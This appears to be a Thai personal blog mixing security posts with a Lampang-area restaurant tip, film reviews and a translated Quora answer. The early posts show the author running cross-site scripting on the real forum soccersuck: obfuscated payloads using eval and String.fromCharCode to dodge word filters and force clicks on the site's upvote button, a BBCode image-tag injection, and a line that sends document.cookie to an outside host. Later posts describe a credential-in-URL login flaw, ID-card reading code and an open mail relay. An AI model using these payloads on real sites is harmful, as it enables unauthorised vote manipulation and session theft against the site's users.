Hakbyist

หลังจากผมโดนปลดแบนใน ss แน่นอนครับ ภารกิจอันดับแรกคือหาว่ายังทำ xss

บน ss ได้หรือเปล่า ผมลองวิธีเดิมครับ

x” onmouserover=document.getElementsByClassName(‘addpoint_button’)[0].click();//

ปรากฏว่าโปรแกรมเมอร์กรองคำว่า onmouse getElementsByClassName และ addpoint_button

ออกครับถ้าทำแบบด้านบนจะเหลือแค่ over=document.(”)[0].click();// ทำให้ code ทำงานไม่ได้ครับ

มันก็เลยเกิดคำถามว่าทำไมตอนที่เราทดสอบ xss เราต้องใช้ alert() แค่ function เดียวจะทำอะไรได้ ?

ผมก็ค้นจนเจอว่าจริงแล้ว function ที่ต้องกลัวคือ eval() ตัว eval จะรับเอา string มาแล้วรันเป็น code ครับ

ดังนั้นผมก็เลยปรับโค้ดเป็น

onwheel=”a=String.fromCharCode(39)+String.fromCharCode(97)+String.fromCharCode(100)
+String.fromCharCode(100)+String.fromCharCode(112)+String.fromCharCode(111)+
String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(116)+
String.fromCharCode(95)+String.fromCharCode(98)+String.fromCharCode(117)+
String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(111)
+String.fromCharCode(110)+String.fromCharCode(39);eval(‘document.ge’+’tElementsB’
+’yClassName(‘+a+’)[0].click()’);//

คือ ถ้า onmouse โดนบล๊อคก็เหลือ event อีกหลาย ๆ แบบ onwheel onerror ที่สามารถใช้งานได้

ถ้า string โดนกรองออกเราก็ใช้ eval หลบโดยการแยก string ออกเป็นส่วน ๆ

แบบนี้ document.ge’+’tElementsB’+’yClassName เพื่อหลบการกรองคำ หรือใช้ fromcharcode เพื่อหลบตัวอักษร

บางตัวก็ได้ครับ จริง ๆ ผมเรียนรู้อะไรเยอะจากครั้งนี้สรุปได้ดังนี้ครับ

– กรองคำบางคำออกไม่เวิร์คแน่ ๆ ต้องกรองพวก ‘ ” ( ) < > พวกนี้ออกจะแก้ได้ค่อนข้างแน่นอน

– ที่เวลาทดสอบทำ alert เพราะกลัว eval

– ถ้าเราสามารถทำ xss ได้แล้วเราสามารถแก้ไข html ที่จุดอื่น ๆ ได้ เช่น แก้ signnature ได้

จากจุดนี้เอาประยุกต์ใช้ได้หลายอย่าง

– ถ้าจะขโมย cookie จาก tag img ทำแบบนี้ครับ

<img src=x onerror=’new Image().src=”http:///?x=”+document.cookie’>

วันนี้ขอแนะนำร้านอร่อย ๆ ใน จว.ลำพูนครับ ร้านปู่หมื่นครับเป็นร้านอาหารตามสั่งครับ

หน้าร้านเป็นประตูไม้ครับหาไม่ยากครับ อยู่ตรงข้ามวัดหนองเส้งครับ เปิดทุกวันจันทร์-ศุกร์

เปิดเวลาประมาณ 9 โมง จนกว่าของจะหมดแนะนำให้ไปก่อนบ่ายสองครับ เพราะของหมดเร็วมาก ๆ ครับ

ผมแนะนำให้ทานก๋วยเตี๋ยวแห้งครับอร่อยมากครับ ส่วนอาหารตามสั่งก็พวก ไข่เจียวหมูสับ

ทอดออกมากรอบมากครับกรอบ ๆ แบบนี้หากินยากครับ กับหมูกระเทียมครับใช้หมูเนื่อแดง

ชิ้นบาง ๆ ไม่สันนอกก็สันในมาทำครับกินกับพริกน้ำปลาอร่อยเหาะเลยครับ

ยายแกเป็นคนทำก๋วยเตี๋ยวครับ

รู้สึกว่าผมจะทำ xss บน soccersuck ได้อีกละแฮะ ปรับพวกฟันหนูนิดหน่อย

คือสถานการณ์ตอนนี้คือ <> ถูก block ไม่ให้ใช้เวลา comment (กลายเป็น &lt &gt)

แต่ bbcode [img] ยังสามารถใช้ได้ผมทำ xss จากตรงนี้ครับ โดยอะไรก็ตามที่อยู่ระหว่าง

[img]http://path-to-image[/img] จะกลายเป็น <img src=”http://path-to-image”>

ดังนั้นถ้าเราใส่ค่า ระหว่า bbcode เป็น [img]http://path-to-image” onload=alert(‘xss’);//[/img]

กลายเป็นว่าผมสามารถแทรก javascript ลงไปได้ โดยจะทำงานตามเงื่อนไขทีผมกำหนด เช่น

onload onmouserover etc ทีนี้แล้วจะสั่งให้กดแผล่บโดยผ่าน dom ครับ โดยใช้

onmouserover=document.getElementsByClassName(‘addpoint_button’)[0].click();

คือเมื่อไหร่ที่มีคนเอา Mouse pointer ไปวางบนภาพให้กดแผล่บอันแรกบนหน้านั้น ๆ

จริง ๆ ผมเคยคาดการณ์ไว้แล้วว่าถ้าสามารถแทรก javascript ได้จะสามารถ

– หลอกเก็บ cookies หรือ บังคับกดแผล่บได้ แต่พอลองทำ windows.location เพื่อเอา cookies

ดันไม่เวิร์คแฮะ เพราะ URL เป็น tag <a href โดยอัตโนมัติ และผมยังหาวิธีแก้ไม่ได้

รู้สึกจะมีคนเอาไป improvise เป็น src=x onerror=document.getElementsByClassName(‘addpoint_button’)[0].click();

ก่อนที่ผมจะโดนแบนนะ แบบนี้ได้แผล่บแน่ ๆ หละครับ

คือ แบบนี้ครับที่ทำงานผมมีระบบสารสนเทศ 2 ระบบ ให้ชื่อว่า ระบบA กับระบบB ละกันครับ
ตอนแรกสองระบบนี่ต่างคนต่างอยู่วิ่งบน vpn ของใครของมัน ทีนี้เกิดการควบรวมเครือข่ายสองระบบ
เข้าด้วยครับ แล้วมีความคิดว่า ถ้าใช้ระบบB ให้สามารถเข้าถึงระบบA ได้เลยไม่ต้อง log in สองครั้ง
ก็น่าจะดี (ทั้งสองระบบเป็น web application ครับ)

ทีนี้โจทย์คือ ระบบB ต้องไม่เก็บ username password ของระบบA ไว้ครับ
ซึ่งตรงนี้ผมไม่ได้เข้าไปมีส่วนร่วมในการออกแบบนะครับ

จนผมไปสังเกตเห็นว่าถ้าเข้าระบบA ผ่านระบบB จะมีการร้องขอ url ไปที่ระบบA
ดังนี้ครับ ค้นมาโดยใช้โปรแกรม นี้ ครับ

https://172.17.2.xx/systemA/systemAConfigManager?user=nlnvEBqG7o0%3D&pwd=3lZatbxCrQ8%3D&link=systemA/xxisa/prepareDAAP0100.do?programID=XXIP01&siteName=systemB

สังเกตใช่ไหมครับว่าส่งไปโดยใช้ get method ส่งค่าที่น่าจะเป็น hash ของ username กับ password
ซึ่งเมื่อลองเข้า url ข้างบนไปปรากฏว่าเข้าได้ครับ ไม่ต้อง log in
กลายเป็นว่าถ้าผมรู้ url ก็สามารถเข้าได้โดยไม่ต้องรู้ username และ password

ตรงนี้เห็นชัดเลยว่าออกแบบไม่ดีครับ เลี่ยงการส่ง username password ที่เป็น plain text ไปแต่ส่งค่า
hash ซึ่งเหมือนกันทุกครั้งก็ไม่มีประโยชน์ครับ เหมือนส่ง plain text ไป แล้วพอมารวมกับการใช้ get method
ทำให้สังเกตง่ายขึ้น และท้ายสุดเครื่องลง ccleaner ครับ แต่ไม่ได้ตั้งค่าให้ลบ history ออกทุกครั้ง
กลายเป็นว่าเกิดเป็นช่องโหว่ให้ใคร ๆ สามารถเข้าถึงระบบได้

(สังเกตพวก fb หรือเว็ปอื่น ๆ ครับเวลา login ไม่ใช้พวก get method หรอกครับ)

อ้อ ทั้งสองระบบนี่ลงทุนหลักร้อยล้านครับ เพราะฉะนั้นมันจำเป็นมาก ๆ ครับ ที่จะมีคนที่เข้าใจเรื่องความปลอดภัย
ร่วมออกแบบหรือ review การทำงานของทุก ๆ ส่วน

เพิ่งดูจบครับ แต่ก็ได้ประเด็นบางอย่าง บางครั้งก็ดูเหมือนว่ามนุษย์นี่ไม่เคยเรียนรู้อะไรเลยนะครับ
หนังพูดถึง อลัน ทรูริ่ง นักคณิตศาสตร์ชาวอังกฤษ ที่มีส่วนร่วมในการถอดรหัสเครื่องอินิกมาของเยอรมัน
ตัว อลัน ค่อนข้างจะแปลกแยกออกจากสังคม ไม่ว่าจะเป็นตอนเรียน หรือตอนทำงาน และไม่เข้าใจวิถีของ
สังคม ฉากกินข้าวนี่ผมฮาก๊ากเลย (ซึ่งไม่แน่ว่าจริง ๆ แกเป็นแบบนั้นหรือเปล่า)

ซึ่งแกมีงานด้านคณิตศาสตร์ค่อนข้างมาก เท่าที่พอจำได้ก็เรื่อง black box ว่าด้วยเครื่องจักรที่สามารถแก้ไขปัญหาได้
ที่เป็นที่มาของคอมพิวเตอร์ทุกวันนี้ หรือวิธีการที่จะทำให้คอมพิวเตอร์สามารถเล่นหมากรุกได้ เรื่องที่น่าเสียดาย
ก็คือแกตายด้วยอายุแค่ 40 ต้น ๆ มีการสันนิษฐานว่าแกฆ่าตัวตายโดยใช้ไซยาไนด์
เพราะในชีวิตจริงแกเป็นเกย์แบบที่หนังเล่ามาครับ ซึ่งตอนนั้นการเป็นเกย์เป็นสิ่งผิดกฎหมาย ทำให้แกต้องได้รับการบำบัด
โดยการตอนโดยใช้สารเคมีครับ เรื่องที่งี่เง่าก็คือ เราได้ยินเรื่องพวกนี้บ่อย ไม่ว่าจะเป็นเรื่องของ กาลิเลโอ
หรือใครซักคนที่มาก่อนเวลา แต่มีความคิดล้ำหน้าไปกว่าคนในยุคนั้น แต่น่าเสียดายที่เรายอมรับความคิดแบบนั้นไม่ได้
หรือยอมรับความแปลกแยกบางอย่างไม่ได้ ทำเราเสียทรัพยากรที่มีคุณค่ามากที่สุดไปครับ

สำหรับ อลัน ทางควีนก็ออกมาขอโทษต่อสิ่งที่เขาได้รับไปเมื่อปี 2013 ครับก็นับว่าไม่ได้สิ้นหวังทีเดียว
อย่างน้อยพวกเราก็ค่อย ๆ เรียนรู้และค่อย ๆ ยอมรับอะไร ๆ ได้มากขึ้น

ผมเขียนเรื่องนี้สำหรับเป็น guideline สำหรับคนที่อยากอ่านข้อมูลในบัตรประชาชนนะครับ

ข้อมูลทั้งหมดได้มาจากคุณพุฒิพงศ์ ซึ่งเป็นคนพัฒนาโปรแกรม นี้ ครับ

ผมเมลไปถามแกหน้าด้าน ๆ เลยครับว่าทำยังไง แกก็ตอบมาแบบละเอียดเลยครับ

เลยไหน ๆ ก็ไหน ๆ ละขอเขียนทิ้งไว้ก็แล้วกันครับเผื่อมีคนอยากทราบวิธี

ผมใช้ lib ของ python pyscard ครับ วิธีการใช้ดูจาก documentation เลยครับ

ตัวอย่างเป็นการอ่านข้อมูลในส่วน public ของ smart card

# -*- coding: cp874 -*-
from smartcard.CardConnection import CardConnection
from smartcard.CardType import AnyCardType
from smartcard.CardRequest import CardRequest
from smartcard.util import toHexString, toBytes

import ธรรมดาครับ

cardtype = AnyCardType()
cardrequest = CardRequest( timeout=1, cardType=cardtype )

cardservice = cardrequest.waitforcard()

cardservice.connection.connect()

เชื่อมต่อไปยัง reader ดูว่ามีการ์ดเสียบอยู่นะ

SELECT = [0x00, 0xA4, 0x04, 0x00, 0x08]
THAI_ID_CARD = [0xA0, 0x00, 0x00, 0x00, 0x54, 0x48, 0x00, 0x01]
REQ_CID = [0x80, 0xb0, 0x00, 0x04, 0x02, 0x00, 0x0d]
REQ_THAI_NAME = [0x80, 0xb0, 0x00, 0x11, 0x02, 0x00, 0x64]
REQ_ENG_NAME = [0x80, 0xb0, 0x00, 0x75, 0x02, 0x00, 0x64]
REQ_GENDER = [0x80, 0xb0, 0x00, 0xE1, 0x02, 0x00, 0x01]
REQ_DOB = [0x80, 0xb0, 0x00, 0xD9, 0x02, 0x00, 0x08]
REQ_ADDRESS = [0x80, 0xb0, 0x15, 0x79, 0x02, 0x00, 0x64]
REQ_ISSUE_EXPIRE = [0x80, 0xb0, 0x01, 0x67, 0x02, 0x00, 0x12]

DATA = [REQ_CID,REQ_THAI_NAME,REQ_ENG_NAME,REQ_GENDER,REQ_DOB,
REQ_ADDRESS,REQ_ISSUE_EXPIRE]

ตรงนี้เป็นคำสั่งในการขอข้อมูลครับ คือ ขั้นตอนการขอข้อมูลจากการ์ดจะเป็น

1. ฉันจะอ่านบัตรประชาชนนะนายใช่บัตรประชาชนรึเปล่า
2. บัตรตอบมาว่าใช่หรือไม่
3. โอเค ฉันอยากได้ข้อมูลเลข 13 หลักที่มีความยาว x
4. บัตรตอบกลับมาว่าฉันมีข้อมูลนี้ ยาว x
5. ขอดูข้อมูลหน่อยละกัน
6. บัตรส่งข้อมูลให้

apdu = SELECT+THAI_ID_CARD
f = open(‘temp.txt’,’w’)

response, sw1, sw2 = cardservice.connection.transmit( apdu )
#print ‘response: ‘, response, ‘ status words: ‘, “%x %x” % (sw1, sw2)

อันนี้เป็นข้อ 1-2 ครับ ดูตรง sw1 กับ sw2 ครับ ถ้าโอเคจะตอบกลับมาเป็น

0x90 xx หรือ 0x61 xx ซึ่ง 90 คือโอเค ส่วน 61 คือ โอเคแต่มีข้อมูล xx ไบต์นะ

#print ‘response: ‘, response, ‘ status words: ‘, “%x %x” % (sw1, sw2)
for d in DATA:
response, sw1, sw2 = cardservice.connection.transmit( d )
print sw1
if sw1 == 0x61:

ไล่ขอข้อมูลใน list DATA ส่วนนี้สังเกตว่าบัตรตอบกลับมาว่า 0x61 มีข้อมูลอีก xx นะ
เริ่มจาก cid

GET_RESPONSE = [0X00, 0XC0, 0x00, 0x00 ]
apdu = GET_RESPONSE + [sw2]

ตรงนี้ขอดูข้อมูลที่บอกว่ามีหน่อย

print ‘sending ‘ + toHexString(apdu)
response, sw1, sw2 = cardservice.connection.transmit( apdu )
print ‘response: ‘, toHexString(response), ‘ status words: ‘, “%x %x” % (sw1, sw2)
result = “”
for i in response:
result = result+chr(i)
f.write(result.strip()+”\n”)

ส่วนนี้แค่ไล่อ่านจนครบทุกข้อมูล จริง ๆ จะมีรูปภาพอีกครับแต่ไม่ได้ทำไว้เพราะอายุบัตรค่อนข้างนาน

รูปในบัตรจะดูห่างจากตัวจริงเยอะไป

ปัญเอิญเมลที่ทำงานมีปัญหามีเมลตีกลับแบบนี้ครับ

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

xxx@gmail.com

Unrouteable address

Google เจอว่าไอ้ Unrouteable address นี่หลัก ๆ แล้วเกิดจากการที่ ส่งเมลเกินโควต้าที่ทำหนดใน server

ซึ่งผมลองส่งเมลโดยใช้ telnet ส่งเมลได้โดยไม่ต้อง authen ครับ สรุปคงมีคนแอบใช้ไปส่งเมลอื่น ๆ จนเกินโควต้าจนเกิด error ดังกล่าวขึ้นครับ

ซึ่งเราสามารถกำหนด เมลผู้ส่ง ผู้รับได้ตามใจ ถามว่าอันตรายมากไหมก็ไม่มากครับแต่อาจจะเอาไปประยุกต์ใช้
เกี่ยวกับพวก spam หรือ phishing ได้ วิธีแก้ก็ให้ทาง hosting config ให้ authen ก่อนส่งเมลทุกครั้งครับ

บังเอิญผมไปเจอคำถาม นี้ ใน Quora ครับ เค้าถามว่าเป็นไปได้ไหมที่เราจะเปลี่ยนแปลงทางด้านจิตใจจนเปลี่ยนเป็นคนละคน ผมเห็นว่าคำตอบของ นิโคลัส น่าสนใจดีก็เลยแปลให้อ่านกันครับ นิโคลัสตอบดังนี้ครับ

นิโคลัส : ผมทำได้

นิโคลัส :

ผมขอใช้ภาพด้านบนเพื่อเสริมคำตอบของผม แต่การเปลี่ยนทางด้านกายภาพเป็นเพียงแค่ส่วนน้อยเท่านั้น

ภาพด้านซ้ายเป็นภาพผมตอนอายุ 15 หนัก 90 ปอนด์ (ราว ๆ 45 กิโลกรัม) ผมป่วยทุกวัน (ได้รับการวินิจฉัยว่าเป็น Celiac desease ภูมิแพ้กลูเตน) ผมขาดโรงเรียนอาทิตย์ละ 2-3 วัน ผมเรียนได้เกรดซีเป็นอย่างมากสำหรับทุกวิชา ผมเล่น WOW แบบหามรุ่งหามค่ำ ผมมีเพื่อนน้อยเพื่อนที่มีก็เป็นพวกที่เจอในเน็ต ผมอ้างว้างและซีมเศร้า นอนไม่หลับไม่ต้องสงสัยว่าเกิดจากการเล่นเกมส์จนดึกดื่น ผมมีมุมมองโลกแต่ในแง่ลบ บ่อยครั้งที่ผมพยายามฆ่าตัวตายหรือหนีออกจากบ้าน

ภาพด้านขวาถ่ายตอนผมอายุ 23 ปี ผมไม่ดื่มไม่สูบ กินแต่อาหารที่มีประโยชน์เพื่อที่โรคประจำตัวจะได้ไม่กำเริบ ผมขาดงานน้อยมาก และจบมาจากมหาวิทยาลัยด้วยเกียรตินิยม เกรดเกือบสี่ (สำหรับคนที่เกมส์เรื่องเกรด ผมทำได้ตอนที่ยังเล่น WOW) ผมมีเพื่อนที่โรงยิมแถวบ้านและเข้าร่วมแวดวงนักกล้าม ผมทำงานในบริษัทโฆษณางานส่วนใหญ่ต้องพบปะผู้คนมาก ผมนั่งสมาธิทุกวันและนอนหลับสนิท ผมมองตัวว่ามีพลังในการสร้างสรรค์ ผมใช้เวลาอย่างหนักในแต่ละวันเพื่อให้คนอื่นตระหนักถึง ความสามารถของตัวเองและกลายเป็นคนที่เขาอยากจะเป็น

เมื่อผมมองภาพของเด็กผอมกะหร่องด้านซ้ายมือผมจำความเจ็บปวด ผมจำบางเรื่องราวและบางความรู้สึกที่แน่ชัดได้ แต่ผมจำเขาไม่ได้เปลี่ยนเป็นมากจากตอนนั้น เขาเป็นเพียงแค่ความทรงจำในอดีตอันไกลโพ้น ผมต้องคอยย้ำว่าเขาเคยมีอยู่จริงไม่เช่นนั้นเขาก็จะหายไปในอดีต

และคุณรู้ไหมนั่นเป็นสิ่งที่สวยงาม

ผมชอบหนังเรื่องนี้มากตรงที่ว่าเป็นหนังเกี่ยวกับดนตรีเรื่องแรกที่ดูแล้ว อึ้งว่าดนตรีมันก็หลักเหลี่ยมกันได้แฮะ แนะนำว่าเป็นหนังที่ดูเรื่องหนึ่งเลยครับ

ประเด็นที่ผมอยากจะพูดเกี่ยวกับหนังก็คือ ไอ้วิธีการที่ เฟลชเชอร์ ใช้ตลอดทั้งเรื่องมันคือวิธีการที่ถูกหรือเปล่า ? การกดดันเพียงอย่างเดียวสามารถทำให้เราก้าวข้ามผ่านขีดจำกัดได้หรือไม่ ?

ผมเรียนโรงเรียนคริสต์เตียนแห่งหนึ่งในจังหวัดเชียงใหม่ สมัยประถมมีมาสเตอร์ท่านหนึ่งสอนวิชาภาษาอังกฤษ มาสเคอร์อันโตนิโอ (เรียกกันเล่น ๆ ในหมู่ผู้ปกครองว่า “ปู่โต”) แกมีวิธีการสอนที่เป็นที่เลื่องลือครับ ทุกครั้งที่แกสอนภาษาอังกฤษแกจะมาพร้อมกับไม้ไผ่พันมาสกิ้งเทปยาวเมตรกว่า แกสอน conversation เป็นหลักแต่จะเน้นการอ่าน (หนังสือการอ่านของแกเป็นเล่มสีเหลือง ๆ เล็ก ซึ่งมีมุขตลกประปราย) แต่วิธีการสอนของแกค่อนข้างจะเครียดครับ แกจะสุ่มให้นักเรียนอ่านเป็นรายบุคคล ใครอ่านไม่ได้จะโดนฟาดด้วยไม้ที่แกเตรียมมา เสียงฟั่บดังและฟังชัด พร้อมกับด่าว่าไอ้ควายใบ้

ผลครับสมัยนั้นโรงเรียนเป็นที่เลื่องลือในความเก่งภาษาอังกฤษของบรรดานักเรียนครับ แต่สำหรับผมเอากันจริง ๆ แทบไม่ได้อะไรครับ พื้นฐานที่ดีส่วนใหญ่มาจากการท่อง vocab ที่ครูภาษาไทยเป็นคนสอนมากกว่าครับ แต่ก็ถือว่ามีพื้นฐานทางภาษาที่ดีพอสมควรแต่ยังพูดภาษาอังกฤษไม่ได้ครับ

จนกระทั่ง ม.ปลาย ครับ ม.ปลายจะมีมาสเตอร์สอนพร้อมกับครูต่างชาติครับ เน้นการสนทนาเป็นหลัก วันหนึ่งผมโดนถามในห้องครับซึ่งก็ตามสไตล์ผมแต่งประโยคที่จะพูดเองซึ่งก็ทำให้มาสเตอร์ค่อนข้างพอใจครับ แกก็ชมผมครับ คือ มันไม่ใช่แค่ feedback ที่ดี แต่มันบอกเราว่าจุดแข็งของเราคืออะไรใช้ประโยชน์ได้อย่างไร ตั้งแต่นั้นผมไม่กลัวภาษาอังกฤษอ่าน text และพูดกับชาวต่างชาติได้อย่างสบาย ๆ

เพราะฉะนั้นการกดดันของ เฟลชเชอร์ หรือปู่โตไม่ได้สร้างอะไรขึ้นมา ไม่ได้บอกว่าอะไรคือจุดแข็งจุดอ่อนที่ควรแก้ ผมไม่ได้ต่อต้านวิธีการที่กดดันนะครับ แต่การจะกดดันต้องบอกด้วยว่าอะไรคือสิ่งที่ทำพลาดไปและอะไรคือจุดแข็งที่สามารถทำให้ตัวผู้รับพัฒนาขึ้นได้ครับ

หลังจากดู Fury จบผมรู้สึกว่ามันไม่ใช่แค่หนังสงครามที่ดูเอามันเฉย ๆ แต่หนังแสดงให้เห็นการเติบโตของ นอร์แมน พลทหารที่มาประจำเป็นผู้ช่วยคนขับคนใหม่ เริ่มจากการเป็นคริสเตียนที่เคร่งครัด ไม่พรากชีวิตคน แต่มาพบเหตุพลิกผลันทำกลายเป็นอีกคน ช่วงท้าย ๆ ของหนังเค้าไม่กลัวที่จะเหนี่ยวไกเพื่อฆ่านาซี ทำให้เห็นว่าสงครามเปลี่ยนคนได้ แต่คำถามที่หนังถามกับเราจริง ๆ คือ

อะไรคือคนดี อะไรคือคนเลว

คนแบบนอร์แมนที่คนอื่นเชื่อว่าเป็นคนดี เป็นคนแรกที่ก้าวขาออกมาเพื่อยันทหาร 300 คนกับจ่า กับทหารคนอื่นที่แสดงออกมาอย่างกักขฬะทั้งเรื่อง แต่อยู่กับจ่าจนวินาทีสุดท้าย เราสามารถที่จะตัดสินคนว่าดีหรือเลวได้จากการกระทำเพียงครั้งเดียวได้ไหม คนแบบนอร์แมนเลวไหมที่หนีเอาตัวรอดคนเดียว แล้วคนแบบเกรดดี้ที่มีปัญหามาทั้งเรื่องยอมตายกับจ่าแม้จะอิดออดบ้างถือว่าเป็นคนดีไหม

ดูเหมือนว่าจะไม่มีคำตอบสำหรับเรื่องนี้ไม่ว่าจะในหนังหรือในชีวิตจริง